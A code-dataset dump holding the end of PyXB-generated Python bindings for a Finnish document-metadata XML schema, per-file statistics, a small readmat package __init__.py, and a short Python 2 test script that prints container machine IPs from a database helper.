fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_15, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_16, [
fac.UpdateInstruction(cc_4, False) ]))
st_4._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_5, True) ]))
transitions.append(fac.Transition(st_6, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_7, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_8, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_9, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_10, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_11, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_12, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_13, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_14, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_15, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_16, [
fac.UpdateInstruction(cc_5, False) ]))
st_5._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_6, [
fac.UpdateInstruction(cc_6, True) ]))
transitions.append(fac.Transition(st_7, [
fac.UpdateInstruction(cc_6, False) ]))
transitions.append(fac.Transition(st_8, [
fac.UpdateInstruction(cc_6, False) ]))
transitions.append(fac.Transition(st_9, [
fac.UpdateInstruction(cc_6, False) ]))
transitions.append(fac.Transition(st_10, [
fac.UpdateInstruction(cc_6, False) ]))
transitions.append(fac.Transition(st_11, [
fac.UpdateInstruction(cc_6, False) ]))
transitions.append(fac.Transition(st_12, [
fac.UpdateInstruction(cc_6, False) ]))
transitions.append(fac.Transition(st_13, [
fac.UpdateInstruction(cc_6, False) ]))
transitions.append(fac.Transition(st_14, [
fac.UpdateInstruction(cc_6, False) ]))
transitions.append(fac.Transition(st_15, [
fac.UpdateInstruction(cc_6, False) ]))
transitions.append(fac.Transition(st_16, [
fac.UpdateInstruction(cc_6, False) ]))
st_6._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_7, [
fac.UpdateInstruction(cc_7, True) ]))
transitions.append(fac.Transition(st_8, [
fac.UpdateInstruction(cc_7, False) ]))
transitions.append(fac.Transition(st_9, [
fac.UpdateInstruction(cc_7, False) ]))
transitions.append(fac.Transition(st_10, [
fac.UpdateInstruction(cc_7, False) ]))
transitions.append(fac.Transition(st_11, [
fac.UpdateInstruction(cc_7, False) ]))
transitions.append(fac.Transition(st_12, [
fac.UpdateInstruction(cc_7, False) ]))
transitions.append(fac.Transition(st_13, [
fac.UpdateInstruction(cc_7, False) ]))
transitions.append(fac.Transition(st_14, [
fac.UpdateInstruction(cc_7, False) ]))
transitions.append(fac.Transition(st_15, [
fac.UpdateInstruction(cc_7, False) ]))
transitions.append(fac.Transition(st_16, [
fac.UpdateInstruction(cc_7, False) ]))
st_7._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_8, [
fac.UpdateInstruction(cc_8, True) ]))
transitions.append(fac.Transition(st_9, [
fac.UpdateInstruction(cc_8, False) ]))
transitions.append(fac.Transition(st_10, [
fac.UpdateInstruction(cc_8, False) ]))
transitions.append(fac.Transition(st_11, [
fac.UpdateInstruction(cc_8, False) ]))
transitions.append(fac.Transition(st_12, [
fac.UpdateInstruction(cc_8, False) ]))
transitions.append(fac.Transition(st_13, [
fac.UpdateInstruction(cc_8, False) ]))
transitions.append(fac.Transition(st_14, [
fac.UpdateInstruction(cc_8, False) ]))
transitions.append(fac.Transition(st_15, [
fac.UpdateInstruction(cc_8, False) ]))
transitions.append(fac.Transition(st_16, [
fac.UpdateInstruction(cc_8, False) ]))
st_8._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_9, [
fac.UpdateInstruction(cc_9, True) ]))
transitions.append(fac.Transition(st_10, [
fac.UpdateInstruction(cc_9, False) ]))
transitions.append(fac.Transition(st_11, [
fac.UpdateInstruction(cc_9, False) ]))
transitions.append(fac.Transition(st_12, [
fac.UpdateInstruction(cc_9, False) ]))
transitions.append(fac.Transition(st_13, [
fac.UpdateInstruction(cc_9, False) ]))
transitions.append(fac.Transition(st_14, [
fac.UpdateInstruction(cc_9, False) ]))
transitions.append(fac.Transition(st_15, [
fac.UpdateInstruction(cc_9, False) ]))
transitions.append(fac.Transition(st_16, [
fac.UpdateInstruction(cc_9, False) ]))
st_9._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_10, [
fac.UpdateInstruction(cc_10, True) ]))
transitions.append(fac.Transition(st_11, [
fac.UpdateInstruction(cc_10, False) ]))
transitions.append(fac.Transition(st_12, [
fac.UpdateInstruction(cc_10, False) ]))
transitions.append(fac.Transition(st_13, [
fac.UpdateInstruction(cc_10, False) ]))
transitions.append(fac.Transition(st_14, [
fac.UpdateInstruction(cc_10, False) ]))
transitions.append(fac.Transition(st_15, [
fac.UpdateInstruction(cc_10, False) ]))
transitions.append(fac.Transition(st_16, [
fac.UpdateInstruction(cc_10, False) ]))
st_10._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_11, [
fac.UpdateInstruction(cc_11, True) ]))
transitions.append(fac.Transition(st_12, [
fac.UpdateInstruction(cc_11, False) ]))
transitions.append(fac.Transition(st_13, [
fac.UpdateInstruction(cc_11, False) ]))
transitions.append(fac.Transition(st_14, [
fac.UpdateInstruction(cc_11, False) ]))
transitions.append(fac.Transition(st_15, [
fac.UpdateInstruction(cc_11, False) ]))
transitions.append(fac.Transition(st_16, [
fac.UpdateInstruction(cc_11, False) ]))
st_11._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_12, [
fac.UpdateInstruction(cc_12, True) ]))
transitions.append(fac.Transition(st_13, [
fac.UpdateInstruction(cc_12, False) ]))
transitions.append(fac.Transition(st_14, [
fac.UpdateInstruction(cc_12, False) ]))
transitions.append(fac.Transition(st_15, [
fac.UpdateInstruction(cc_12, False) ]))
transitions.append(fac.Transition(st_16, [
fac.UpdateInstruction(cc_12, False) ]))
st_12._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_13, [
fac.UpdateInstruction(cc_13, True) ]))
transitions.append(fac.Transition(st_14, [
fac.UpdateInstruction(cc_13, False) ]))
transitions.append(fac.Transition(st_15, [
fac.UpdateInstruction(cc_13, False) ]))
transitions.append(fac.Transition(st_16, [
fac.UpdateInstruction(cc_13, False) ]))
st_13._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_14, [
]))
transitions.append(fac.Transition(st_14, [
fac.UpdateInstruction(cc_14, True) ]))
transitions.append(fac.Transition(st_15, [
fac.UpdateInstruction(cc_14, True) ]))
transitions.append(fac.Transition(st_16, [
fac.UpdateInstruction(cc_14, False) ]))
st_14._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_14, [
fac.UpdateInstruction(cc_14, True) ]))
transitions.append(fac.Transition(st_15, [
]))
transitions.append(fac.Transition(st_15, [
fac.UpdateInstruction(cc_14, True) ]))
transitions.append(fac.Transition(st_16, [
fac.UpdateInstruction(cc_14, False) ]))
st_15._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_16, [
fac.UpdateInstruction(cc_15, True) ]))
st_16._set_transitionSet(transitions)
return fac.Automaton(states, counters, True, containing_state=None)
toimenpidetiedotTyyppi._Automaton = _BuildAutomaton_11()
asiakirjatietoTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'AsiakirjaluokkaTeksti'), asiakirjaLuokkaTekstiTyyppi, scope=asiakirjatietoTyyppi, location=None))
asiakirjatietoTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'OrganisaatioNimi'), pyxb.binding.datatypes.string, scope=asiakirjatietoTyyppi, location=None))
asiakirjatietoTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'TietojarjestelmaNimi'), pyxb.binding.datatypes.string, scope=asiakirjatietoTyyppi, location=None))
asiakirjatietoTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'LaatijaNimi'), _ImportedBinding_metarecord_binding__jhs.NimiTyyppi, scope=asiakirjatietoTyyppi, location=None))
asiakirjatietoTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'LaadittuPvm'), _ImportedBinding_metarecord_binding__jhs.AlkuPvmTyyppi, scope=asiakirjatietoTyyppi, location=None))
asiakirjatietoTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'MuokkaajaNimi'), _ImportedBinding_metarecord_binding__jhs.NimiTyyppi, scope=asiakirjatietoTyyppi, location=None))
asiakirjatietoTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'MuokattuPvm'), _ImportedBinding_metarecord_binding__jhs.AlkuPvmTyyppi, scope=asiakirjatietoTyyppi, location=None))
asiakirjatietoTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'HyvaksyjaNimi'), _ImportedBinding_metarecord_binding__jhs.NimiTyyppi, scope=asiakirjatietoTyyppi, location=None))
asiakirjatietoTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'HyvaksyttyPvm'), _ImportedBinding_metarecord_binding__jhs.AlkuPvmTyyppi, scope=asiakirjatietoTyyppi, location=None))
asiakirjatietoTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'VoimassaoloAlkaaPvm'), _ImportedBinding_metarecord_binding__jhs.AlkuPvmTyyppi, scope=asiakirjatietoTyyppi, location=None))
asiakirjatietoTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'VoimassaoloPaattyyPvm'), _ImportedBinding_metarecord_binding__jhs.LoppuPvmTyyppi, scope=asiakirjatietoTyyppi, location=None))
asiakirjatietoTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'PaatietoryhmatTeksti'), pyxb.binding.datatypes.string, scope=asiakirjatietoTyyppi, location=None))
asiakirjatietoTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'AsiakirjaluokkaTarkenneTeksti'), pyxb.binding.datatypes.string, scope=asiakirjatietoTyyppi, location=None))
asiakirjatietoTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Laajennos'), CTD_ANON_, scope=asiakirjatietoTyyppi, documentation='Yleinen laajennoselementti. Laajennoksilla mahdollistetaan organisaatiokohtaiset elementit.', location=None))
asiakirjatietoTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Asiasanat'), asiasanatTyyppi, scope=asiakirjatietoTyyppi, location=None))
asiakirjatietoTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Kasittelysaannot'), kasittelysaannotTyyppi, scope=asiakirjatietoTyyppi, location=None))
asiakirjatietoTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Kayttorajoitustiedot'), kayttorajoitusTiedotTyyppi, scope=asiakirjatietoTyyppi, location=None))
asiakirjatietoTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Sailytysaikatiedot'), sailytysaikaTiedotTyyppi, scope=asiakirjatietoTyyppi, location=None))
def _BuildAutomaton_12 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_12
del _BuildAutomaton_12
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=1, metadata=None)
counters.add(cc_0)
cc_1 = fac.CounterCondition(min=0, max=1, metadata=None)
counters.add(cc_1)
cc_2 = fac.CounterCondition(min=0, max=1, metadata=None)
counters.add(cc_2)
cc_3 = fac.CounterCondition(min=0, max=1, metadata=None)
counters.add(cc_3)
cc_4 = fac.CounterCondition(min=0, max=1, metadata=None)
counters.add(cc_4)
cc_5 = fac.CounterCondition(min=0, max=1, metadata=None)
counters.add(cc_5)
cc_6 = fac.CounterCondition(min=0, max=1, metadata=None)
counters.add(cc_6)
cc_7 = fac.CounterCondition(min=0, max=1, metadata=None)
counters.add(cc_7)
cc_8 = fac.CounterCondition(min=0, max=1, metadata=None)
counters.add(cc_8)
cc_9 = fac.CounterCondition(min=0, max=1, metadata=None)
counters.add(cc_9)
cc_10 = fac.CounterCondition(min=0, max=1, metadata=None)
counters.add(cc_10)
cc_11 = fac.CounterCondition(min=0, max=1, metadata=None)
counters.add(cc_11)
cc_12 = fac.CounterCondition(min=0, max=None, metadata=None)
counters.add(cc_12)
cc_13 = fac.CounterCondition(min=0, max=1, metadata=None)
counters.add(cc_13)
cc_14 = fac.CounterCondition(min=0, max=None, metadata=None)
counters.add(cc_14)
states = []
final_update = None
symbol = pyxb.binding.content.ElementUse(asiakirjatietoTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Kayttorajoitustiedot')), None)
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = None
symbol = pyxb.binding.content.ElementUse(asiakirjatietoTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Sailytysaikatiedot')), None)
st_1 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
final_update = None
symbol = pyxb.binding.content.ElementUse(asiakirjatietoTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'OrganisaatioNimi')), None)
st_2 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_2)
final_update = None
symbol = pyxb.binding.content.ElementUse(asiakirjatietoTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'LaatijaNimi')), None)
st_3 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_3)
final_update = None
symbol = pyxb.binding.content.ElementUse(asiakirjatietoTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'LaadittuPvm')), None)
st_4 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_4)
final_update = None
symbol = pyxb.binding.content.ElementUse(asiakirjatietoTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'MuokkaajaNimi')), None)
st_5 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_5)
final_update = None
symbol = pyxb.binding.content.ElementUse(asiakirjatietoTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'MuokattuPvm')), None)
st_6 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_6)
final_update = None
symbol = pyxb.binding.content.ElementUse(asiakirjatietoTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'HyvaksyjaNimi')), None)
st_7 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_7)
final_update = None
symbol = pyxb.binding.content.ElementUse(asiakirjatietoTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'HyvaksyttyPvm')), None)
st_8 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_8)
final_update = None
symbol = pyxb.binding.content.ElementUse(asiakirjatietoTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'VoimassaoloAlkaaPvm')), None)
st_9 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_9)
final_update = None
symbol = pyxb.binding.content.ElementUse(asiakirjatietoTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'VoimassaoloPaattyyPvm')), None)
st_10 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_10)
final_update = set()
symbol = pyxb.binding.content.ElementUse(asiakirjatietoTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'AsiakirjaluokkaTeksti')), None)
st_11 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_11)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_9, False))
symbol = pyxb.binding.content.ElementUse(asiakirjatietoTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'AsiakirjaluokkaTarkenneTeksti')), None)
st_12 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_12)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_10, False))
symbol = pyxb.binding.content.ElementUse(asiakirjatietoTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'TietojarjestelmaNimi')), None)
st_13 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_13)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_11, False))
symbol = pyxb.binding.content.ElementUse(asiakirjatietoTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Kasittelysaannot')), None)
st_14 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_14)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_12, False))
symbol = pyxb.binding.content.ElementUse(asiakirjatietoTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Asiasanat')), None)
st_15 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_15)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_13, False))
symbol = pyxb.binding.content.ElementUse(asiakirjatietoTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'PaatietoryhmatTeksti')), None)
st_16 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_16)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_14, False))
symbol = pyxb.binding.content.ElementUse(asiakirjatietoTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Laajennos')), None)
st_17 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_17)
transitions = []
transitions.append(fac.Transition(st_1, [
]))
st_0._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_2, [
]))
transitions.append(fac.Transition(st_3, [
]))
transitions.append(fac.Transition(st_4, [
]))
transitions.append(fac.Transition(st_5, [
]))
transitions.append(fac.Transition(st_6, [
]))
transitions.append(fac.Transition(st_7, [
]))
transitions.append(fac.Transition(st_8, [
]))
transitions.append(fac.Transition(st_9, [
]))
transitions.append(fac.Transition(st_10, [
]))
transitions.append(fac.Transition(st_11, [
]))
st_1._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_6, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_7, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_8, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_9, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_10, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_11, [
fac.UpdateInstruction(cc_0, False) ]))
st_2._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_1, True) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_6, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_7, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_8, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_9, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_10, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_11, [
fac.UpdateInstruction(cc_1, False) ]))
st_3._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_2, True) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_6, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_7, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_8, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_9, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_10, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_11, [
fac.UpdateInstruction(cc_2, False) ]))
st_4._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_3, True) ]))
transitions.append(fac.Transition(st_6, [
fac.UpdateInstruction(cc_3, False) ]))
transitions.append(fac.Transition(st_7, [
fac.UpdateInstruction(cc_3, False) ]))
transitions.append(fac.Transition(st_8, [
fac.UpdateInstruction(cc_3, False) ]))
transitions.append(fac.Transition(st_9, [
fac.UpdateInstruction(cc_3, False) ]))
transitions.append(fac.Transition(st_10, [
fac.UpdateInstruction(cc_3, False) ]))
transitions.append(fac.Transition(st_11, [
fac.UpdateInstruction(cc_3, False) ]))
st_5._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_6, [
fac.UpdateInstruction(cc_4, True) ]))
transitions.append(fac.Transition(st_7, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_8, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_9, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_10, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_11, [
fac.UpdateInstruction(cc_4, False) ]))
st_6._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_7, [
fac.UpdateInstruction(cc_5, True) ]))
transitions.append(fac.Transition(st_8, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_9, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_10, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_11, [
fac.UpdateInstruction(cc_5, False) ]))
st_7._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_8, [
fac.UpdateInstruction(cc_6, True) ]))
transitions.append(fac.Transition(st_9, [
fac.UpdateInstruction(cc_6, False) ]))
transitions.append(fac.Transition(st_10, [
fac.UpdateInstruction(cc_6, False) ]))
transitions.append(fac.Transition(st_11, [
fac.UpdateInstruction(cc_6, False) ]))
st_8._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_9, [
fac.UpdateInstruction(cc_7, True) ]))
transitions.append(fac.Transition(st_10, [
fac.UpdateInstruction(cc_7, False) ]))
transitions.append(fac.Transition(st_11, [
fac.UpdateInstruction(cc_7, False) ]))
st_9._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_10, [
fac.UpdateInstruction(cc_8, True) ]))
transitions.append(fac.Transition(st_11, [
fac.UpdateInstruction(cc_8, False) ]))
st_10._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_12, [
]))
transitions.append(fac.Transition(st_13, [
]))
transitions.append(fac.Transition(st_14, [
]))
transitions.append(fac.Transition(st_15, [
]))
transitions.append(fac.Transition(st_16, [
]))
transitions.append(fac.Transition(st_17, [
]))
st_11._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_12, [
fac.UpdateInstruction(cc_9, True) ]))
transitions.append(fac.Transition(st_13, [
fac.UpdateInstruction(cc_9, False) ]))
transitions.append(fac.Transition(st_14, [
fac.UpdateInstruction(cc_9, False) ]))
transitions.append(fac.Transition(st_15, [
fac.UpdateInstruction(cc_9, False) ]))
transitions.append(fac.Transition(st_16, [
fac.UpdateInstruction(cc_9, False) ]))
transitions.append(fac.Transition(st_17, [
fac.UpdateInstruction(cc_9, False) ]))
st_12._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_13, [
fac.UpdateInstruction(cc_10, True) ]))
transitions.append(fac.Transition(st_14, [
fac.UpdateInstruction(cc_10, False) ]))
transitions.append(fac.Transition(st_15, [
fac.UpdateInstruction(cc_10, False) ]))
transitions.append(fac.Transition(st_16, [
fac.UpdateInstruction(cc_10, False) ]))
transitions.append(fac.Transition(st_17, [
fac.UpdateInstruction(cc_10, False) ]))
st_13._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_14, [
fac.UpdateInstruction(cc_11, True) ]))
transitions.append(fac.Transition(st_15, [
fac.UpdateInstruction(cc_11, False) ]))
transitions.append(fac.Transition(st_16, [
fac.UpdateInstruction(cc_11, False) ]))
transitions.append(fac.Transition(st_17, [
fac.UpdateInstruction(cc_11, False) ]))
st_14._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_15, [
fac.UpdateInstruction(cc_12, True) ]))
transitions.append(fac.Transition(st_16, [
fac.UpdateInstruction(cc_12, False) ]))
transitions.append(fac.Transition(st_17, [
fac.UpdateInstruction(cc_12, False) ]))
st_15._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_16, [
fac.UpdateInstruction(cc_13, True) ]))
transitions.append(fac.Transition(st_17, [
fac.UpdateInstruction(cc_13, False) ]))
st_16._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_17, [
fac.UpdateInstruction(cc_14, True) ]))
st_17._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
asiakirjatietoTyyppi._Automaton = _BuildAutomaton_12()
| 58.196499
| 654
| 0.775873
| 25,581
| 249,372
| 7.320433
| 0.023807
| 0.067498
| 0.074248
| 0.099005
| 0.858339
| 0.837273
| 0.833839
| 0.83017
| 0.777672
| 0.768247
| 0
| 0.02645
| 0.11764
| 249,372
| 4,284
| 655
| 58.210084
| 0.824611
| 0.092416
| 0
| 0.746988
| 1
| 0.001854
| 0.127973
| 0.081922
| 0
| 0
| 0
| 0
| 0
| 1
| 0.004634
| false
| 0
| 0.023479
| 0
| 0.163732
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
93083a5637c972f2dbb833ec0bfbbe992aa44539
| 242
|
py
|
Python
|
__init__.py
|
AnthonyAndroulakis/mattools
|
d0cad49291bf11af57d78b206d3d265af6179b32
|
[
"WTFPL"
] | 1
|
2019-11-02T03:32:57.000Z
|
2019-11-02T03:32:57.000Z
|
__init__.py
|
AnthonyAndroulakis/mattools
|
d0cad49291bf11af57d78b206d3d265af6179b32
|
[
"WTFPL"
] | null | null | null |
__init__.py
|
AnthonyAndroulakis/mattools
|
d0cad49291bf11af57d78b206d3d265af6179b32
|
[
"WTFPL"
] | null | null | null |
from readmat import readmat
from readmat.readmat import load
from readmat.readmat import mat2obj
from readmat.readmat import mat2dict
from readmat.readmat import options
from readmat.readmat import Struct
from readmat.readmat import loadmat
| 26.888889
| 36
| 0.855372
| 34
| 242
| 6.088235
| 0.264706
| 0.371981
| 0.521739
| 0.695652
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.00939
| 0.119835
| 242
| 8
| 37
| 30.25
| 0.962441
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
93141c1d3031aa72404717475ae15d719c99f4f9
| 342
|
py
|
Python
|
orchestration/test/database/test.py
|
monkey-H/nap-core
|
50d23b0431682f276990db04527deae3b6d84661
|
[
"Apache-2.0"
] | null | null | null |
orchestration/test/database/test.py
|
monkey-H/nap-core
|
50d23b0431682f276990db04527deae3b6d84661
|
[
"Apache-2.0"
] | null | null | null |
orchestration/test/database/test.py
|
monkey-H/nap-core
|
50d23b0431682f276990db04527deae3b6d84661
|
[
"Apache-2.0"
] | null | null | null |
from orchestration.database import database_update
#print database_update.machine_ip('wangwy', 'wangwy', 'cdh', 'slave1')
#print database_update.machine_ip('wangwy', 'wangwy', 'cdh', 'master')
#print database_update.machine_ip('wangwy', 'wangwy', 'cdh', 'cloudera_manager')
print database_update.machine_ip('mongo', 'mongo', 'test', 'web')
| 42.75
| 80
| 0.748538
| 43
| 342
| 5.72093
| 0.395349
| 0.284553
| 0.308943
| 0.422764
| 0.638211
| 0.52439
| 0.52439
| 0.52439
| 0
| 0
| 0
| 0.003165
| 0.076023
| 342
| 7
| 81
| 48.857143
| 0.775316
| 0.634503
| 0
| 0
| 0
| 0
| 0.139344
| 0
